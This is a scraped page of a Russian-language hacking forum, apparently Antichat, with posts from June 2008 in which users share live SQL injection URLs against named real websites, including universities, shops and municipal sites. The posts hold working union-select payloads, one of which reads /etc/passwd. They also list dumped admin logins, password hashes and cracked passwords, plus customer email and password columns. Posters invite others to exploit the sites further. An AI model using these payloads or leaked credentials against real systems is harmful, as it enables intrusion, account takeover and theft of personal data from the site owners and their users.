ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #5731  
Старый 16.06.2008, 00:58
Аватар для Ch3ck
Ch3ck
Познавший АНТИЧАТ
Регистрация: 09.06.2006
Сообщений: 1,359
Провел на форуме:
5301021

Репутация: 1879


По умолчанию

Код:
http://www.mebi.us/out.php?id=-3+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,0x2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e  2e2f6574632f706173737764/*
PHp inj
 
Ответить с цитированием

  #5732  
Старый 16.06.2008, 05:56
Аватар для sabe
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию

Umaine.edu PR8 - вкусная Еда.)
Цитата:
http://www2.umaine.edu/graduate/article.php?id=63'+union+select+1,aes_decrypt(aes_ encrypt(concat_ws(0x3a,username,0x2F2A2A2F,passwor d),0x71),0x71),3,4+from+users+limit+1,1/*
scott;graduate
Цитата:
http://www2.umaine.edu/graduate/article.php?id=63'+union+select+1,aes_decrypt(aes_ encrypt(concat_ws(0x3a,password),0x71),0x71),3,4+f rom+rec_passwords+where+id=40+limit+1,1/*
Hampshire.edu PR7 - Сладкая Еда, кому надо тот ест.)
Цитата:
http://www.hampshire.edu/cms/index.php?id=1+union+select+1/*
LUKAC, разкрутил..)
Цитата:
http://www.bigshoebazaar.com/showprod.php?prcd=2422+union+select+concat_ws(0x3a ,emailadd,cpwd,acc_crdt,0x2e)+from+customer/*
едушки
Цитата:
http://cahfs.ucdavis.edu/show.php?id=-1
Цитата:
http://spa.american.edu/pages.php?ID=1'
Цитата:
http://www.metropolitan.edu/news/newsdetail.php?id=309'
Цитата:
http://cils.exploratorium.edu/cils/page.php?ID=1'
и еще
Цитата:
http://www.cityofgod.org/music/albums.php?id=1'

Последний раз редактировалось sabe; 16.06.2008 в 17:00..
 
Ответить с цитированием

  #5733  
Старый 16.06.2008, 08:29
Аватар для #urbaner
#urbaner
Новичок
Регистрация: 30.03.2008
Сообщений: 19
Провел на форуме:
95226

Репутация: 10
Отправить сообщение для #urbaner с помощью ICQ
Post

Цитата:
http://www.aquasystems.md/readarticle.php?id=34+union+select+1,table_name,3+ from+information_schema.tables/*
P.S.За интересовала таблица ROUTINES, ну вобщем юзайте.

Цитата:
http://www.avia.ru/safety/?id=17'
P.S.PostgreSQL

Последний раз редактировалось #urbaner; 16.06.2008 в 08:42..
 
Ответить с цитированием

  #5734  
Старый 16.06.2008, 15:15
Аватар для Toxic
Toxic
Новичок
Регистрация: 12.01.2008
Сообщений: 8
Провел на форуме:
39279

Репутация: 25
Отправить сообщение для Toxic с помощью ICQ
По умолчанию

http://fevralka.ru/

http://fevralka.ru/index.php?p=gallerypic&img_id=-156+union+select+1,2,3,Column_name,5,6,7,8,9+from+ information_schema.columns+where+table_name=char(1 07,111,111,98,105,52,95,117,115,101,114)+limit+16, 1--&galid=8&area=1

http://fevralka.ru/index.php?p=gallerypic&img_id=-156+UNION+SELECT+1,2,3,TABLE_NAME+,5,6,7,8,9+FROM+ INFORMATION_SCHEMA.TABLES+LIMIT+79,1--&galid=8&area=1

http://fevralka.ru/index.php?p=gallerypic&img_id=-156+union+select+1,2,3,concat_ws(char(124),uname,p ass),5,6,7,8,9+from+koobi4_user+limit+0,1--&galid=8&area=1

Fevralka|5d22b1855e0d9dd5eedf29d80fad4b04
361557736155773615577

Хом сайт симпотичной девушки ))

Обратите внимание на пороль скорее всего домашний телефон (Это если девушка пригленнеться ))))

Вот жмоты не кто даже бала не добавили (((

Последний раз редактировалось Toxic; 16.06.2008 в 18:35..
 
Ответить с цитированием

  #5735  
Старый 16.06.2008, 15:25
Аватар для z1k
z1k
Новичок
Регистрация: 11.05.2008
Сообщений: 12
Провел на форуме:
36048

Репутация: 5
По умолчанию

Код:
http://www.the213.net/php/article.php?id=-796+uni on+sel ect+1,2,3,4,5,6,7,8,9,10,11,12,13,version(),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82/*
скоко нашол))скулей а анти бойан прошла токо эта :'(
 
Ответить с цитированием

  #5736  
Старый 16.06.2008, 22:36
Аватар для Fata1ex
Fata1ex
Постоянный
Регистрация: 12.12.2006
Сообщений: 906
Провел на форуме:
4205500

Репутация: 930


По умолчанию

Сегодня у нас .nl

PR - 7

Цитата:
http://www.hupo2008.nl/index.php?ID=-227+union+select+1,2,3,4,5,6,7,8,9,10,11,12/*
Не стал крутить, так как всетки ПР хороший - кому надо, тот сам раскрутит


PR - 6

Цитата:
http://www.tinbergen.nl/fellows.php?id=-172+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,concat_ws(0x3a,id,name,password),19,20,21 ,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,3 8,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54, 55,56,57,concat_ws(0x3a,user(),version(),database( )),59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74 ,75,76,77,78,79,80,81,82,83,84,85,86+from+adminacc ounts/*
Много хороших таблиц нашел - кому надо, опять таки же, раскопает. Много юзеров там )
Код:
adminaccounts {id, email, password .... }
user {user, password ... }
1:walther::7557c6b03f224601:gorilla
Как видно - это админ. Админку не искал ))

root@localhost:5.0.45:ti_database


PR - 5

Цитата:
http://cata.montevideo.nl/artist.php?id=3+order+by+5/*
Разберетесь


PR - 5

Цитата:
http://www.technepress.nl/publications.php?id=-13+union+select+1,concat_ws(0x3a,user(),version(), database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19/*
technepress@10.0.0.49:4.1.22-log:technepress


PR - 5

Цитата:
http://www.bispublishers.nl/bookpage.php?id=-92+union+select+1,2,concat_ws(0x3a,id,name,passwor d),concat_ws(0x3a,user(),version(),database()),5,6 ,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,2 4,25,26,27,28,29,30,31,32,33,34,35,36,37+from+user s/*
1:jerry:a804942b62c5ad042450ce2c7a586f16:fl2sh - Админ.

http://www.bispublishers.nl/admin/
- Админка.

eholla_bisa@wh-www23.xs4all.nl:5.0.26-log:eholla_bis


PR - 4

Цитата:
http://www.audioarts.nl/getNews.php?ID=-19+union+select+concat_ws(0x3a,id,username,passwor d),concat_ws(0x3a,user(),version(),database())+fro m+users/*

1:MichaelTiel:7778da162a13f837dd1c592d61ac6fed
- Админ.

audioarts@localhost:5.0.24a-Debian_9ubuntu2.4:audioarts


Большое спасибо сервису - hashcracking.info

Очень попрошу - без дефейсов.
 
Ответить с цитированием

  #5737  
Старый 17.06.2008, 01:06
Аватар для ~!DoK_tOR!~
~!DoK_tOR!~
Banned
Регистрация: 10.11.2006
Сообщений: 829
Провел на форуме:
2634544

Репутация: 1559


Отправить сообщение для ~!DoK_tOR!~ с помощью ICQ
По умолчанию

www.bamberg.de

Цитата:
http://www.bamberg.de/regionaldb/combosearch.phtml?id=-1+union+select+1,table_name,3,4,5+from+information _schema.tables/*
www.systemxkayak.co.uk

Цитата:
http://www.systemxkayak.co.uk/gear_list_brand.php?brandID=1+union+select+1,2,3,c oncat_ws(0x3a,version(),user(),database()),5,6,7,8 ,9,10,11,12,13/*
pepperpod.de

Цитата:
http://pepperpod.de/cast.php?c=4&id=-1+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34, 35,36,37/*
Цитата:
http://pepperpod.de/cast.php?c=4&id=-1+union+select+1,table_name,3,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31,32,33,34,35,36,37+from+information_schema. tables+limit+20,1/*

Последний раз редактировалось ~!DoK_tOR!~; 17.06.2008 в 01:28..
 
Ответить с цитированием

  #5738  
Старый 17.06.2008, 06:50
Аватар для echobyte
echobyte
Moderator - Level 7
Регистрация: 07.03.2008
Сообщений: 568
Провел на форуме:
4140471

Репутация: 708


Отправить сообщение для echobyte с помощью ICQ
По умолчанию

softjoys.ru
Цитата:
http://academy.softjoys.ru/?pid=61&cid='+UNION+SELECT+1,2,3,4,5,6,7,8,9,USER( ),DATABASE(),VERSION(),13,14,15,16/*
 
Ответить с цитированием

  #5739  
Старый 17.06.2008, 16:47
Аватар для ~!DoK_tOR!~
~!DoK_tOR!~
Banned
Регистрация: 10.11.2006
Сообщений: 829
Провел на форуме:
2634544

Репутация: 1559


Отправить сообщение для ~!DoK_tOR!~ с помощью ICQ
По умолчанию

www.inbiworld.com shop какой-то

Цитата:
http://www.inbiworld.com/shop_list.php?newlang=_ru&page=3&kind=-1+union+select+1,2,3,4,concat_ws(0x3a,nombre,passw ord,email)+from+usersshop/*
asia:kruta
http://www.inbiworld.com/shop/

Цитата:
http://www.inbiworld.com/shop_list.php?newlang=_ru&page=3&kind=-1+union+select+1,2,3,4,concat_ws(0x3a,name,passwor d,email)+from+hemp_costumers+where+id=3/*
Цитата:
http://www.inbiworld.com/shop_list.php?newlang=_ru&page=3&kind=-1+union+select+1,2,3,4,concat_ws(0x3a,name,passwor d,email)+from+idpress_costumers+where+id=1/*
Цитата:
http://www.inbiworld.com/shop_list.php?newlang=_ru&page=3&kind=-1+union+select+1,2,3,4,concat_ws(0x3a,name,passwor d,email)+from+memb_members/*
Цитата:
http://www.inbiworld.com/shop_list.php?newlang=_ru&page=3&kind=-1+union+select+1,2,3,4,concat_ws(0x3a,nombre,passw ord,email)+from+usersinbi+limit+1,1/*
Цитата:
http://www.inbiworld.com/shop_list.php?newlang=_ru&page=3&kind=-1+union+select+1,2,3,4,concat_ws(0x3a,name,passwor d,email)+from+wom_users/*
Цитата:
http://www.inbiworld.com/shop_list.php?newlang=_ru&page=3&kind=-1+union+select+1,2,3,4,concat_ws(0x3a,AdminUsernam e,AdminPassword)+from+tblAdminUsers/
админы

inbiadmin:bagua
roman:inbi_au
tom:taichi

но админки не нашёл (

www.vmth.ucdavis.edu

Цитата:
http://www.vmth.ucdavis.edu/forms/emailform.php?id=-1+union+select+concat_ws(0x3a,version(),user(),dat abase()),2/*
PhotoUa.Net - Фото Украины

Цитата:
http://www.photoua.net/show_ua.php?cur_cat_id=-1+union+select+1,concat_ws(0x3a,username,user_pass word,user_email),3,4,5+from+phpbb_users+where+user _id=2/*
Ruslan:851bdb204959a3667778e19dba686c5d:admin@phot oua.net

millionchik.ru Миллиончик

Цитата:
http://www.millionchik.ru/index.php5?module=company&cId=-1+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat_ws (0x3a,version(),user(),database()),0x71),0x71),3,4 ,5,6,7/*

Последний раз редактировалось ~!DoK_tOR!~; 17.06.2008 в 17:46..
 
Ответить с цитированием

  #5740  
Старый 17.06.2008, 20:52
Аватар для Toxic
Toxic
Новичок
Регистрация: 12.01.2008
Сообщений: 8
Провел на форуме:
39279

Репутация: 25
Отправить сообщение для Toxic с помощью ICQ
По умолчанию

http://www.ndfeb.ru/news.php?act=news&num=-53+union+select+1,2,3,4,5,6,concat_ws(char(124),us er,password)+from+user+limit+0,1/*

http://www.ndfeb.ru/admin

Admin|379f51227aa6aef0
tubgtn
А теперь вопрос. как зайти в админку?
Я думал имея логин и пас хватит что бы попасть аказалось не так кто сможет попасть скиньте. Уж больно интерестная админка.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ